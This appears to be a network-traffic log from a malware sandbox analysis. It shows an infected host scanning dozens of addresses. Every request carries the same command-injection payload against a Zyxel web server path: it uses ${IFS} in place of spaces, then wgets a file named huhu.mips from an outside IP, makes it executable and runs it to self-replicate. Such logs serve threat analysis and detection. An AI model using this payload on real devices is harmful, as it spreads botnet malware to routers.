                                                  Jan 19, 2024 18:24:15.442903042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9098192.168.2.1334644188.100.85.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442935944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9099192.168.2.135929434.3.194.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.442974091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9100192.168.2.133905287.98.196.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443007946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9101192.168.2.1338172159.60.154.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443067074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9102192.168.2.1338884179.167.82.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443110943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9103192.168.2.134899035.207.82.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443145037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9104192.168.2.1357474113.50.59.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443201065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9105192.168.2.133968643.188.42.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443222046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9106192.168.2.135471073.243.120.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443273067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9107192.168.2.133317852.84.152.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443310022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9108192.168.2.135781851.192.106.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443366051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9109192.168.2.1352472165.218.94.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443401098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9110192.168.2.134894819.58.144.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443442106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9111192.168.2.135344857.248.243.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443470955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9112192.168.2.134850813.35.199.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443516016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9113192.168.2.1340238223.32.53.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443552017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9114192.168.2.135552027.21.250.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443598032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9115192.168.2.1342428138.117.140.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443629980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9116192.168.2.1344642176.58.253.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443684101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9117192.168.2.1352690187.132.32.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443734884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9118192.168.2.1359460220.49.227.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443777084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9119192.168.2.1352776172.229.74.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443805933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9120192.168.2.13468221.45.150.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443859100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9121192.168.2.135662270.169.7.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443912029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9122192.168.2.1348434181.247.186.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.443964005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9123192.168.2.136046863.149.167.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444016933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9124192.168.2.1343368151.94.47.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444042921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9125192.168.2.135206468.140.195.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444078922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9126192.168.2.1346704157.35.29.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444120884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9127192.168.2.1334728120.111.131.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444161892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9128192.168.2.1358416206.254.65.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444201946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9129192.168.2.1346290200.96.176.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444272995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9130192.168.2.1359250171.225.242.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444309950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9131192.168.2.1334144167.251.203.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444345951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9132192.168.2.134638076.206.252.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444396973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9133192.168.2.135121024.127.112.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444442987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9134192.168.2.134936269.146.70.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444487095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9135192.168.2.1347962104.88.166.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444540024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9136192.168.2.135714236.17.200.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444571018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9137192.168.2.1353830121.62.133.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444595098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9138192.168.2.1342730163.152.151.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444633007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9139192.168.2.135512647.233.35.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444678068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9140192.168.2.1349792173.162.14.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444714069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9141192.168.2.13424065.17.64.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444756985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9142192.168.2.135933089.164.171.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444792032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9143192.168.2.135292086.4.233.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444845915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9144192.168.2.1355118172.133.45.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444886923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9145192.168.2.1355654170.196.135.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444927931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9146192.168.2.1345218196.41.178.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.444977045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9147192.168.2.1333658192.131.104.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445008039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9148192.168.2.1350556185.27.92.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445033073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9149192.168.2.1344220202.185.176.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445074081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9150192.168.2.133505689.230.145.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445121050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9151192.168.2.133531087.168.84.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445161104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9152192.168.2.1339504164.45.44.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445228100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9153192.168.2.133818876.28.203.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445280075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9154192.168.2.133733286.163.185.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445318937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9155192.168.2.1339678112.219.106.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445358992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9156192.168.2.1334404106.160.12.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445415020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9157192.168.2.134064465.2.6.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445449114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9158192.168.2.135603860.119.149.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445502996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9159192.168.2.134205241.39.97.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445539951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9160192.168.2.1350868148.53.64.110443
                                                  TimestampBytes transferredDirectionData
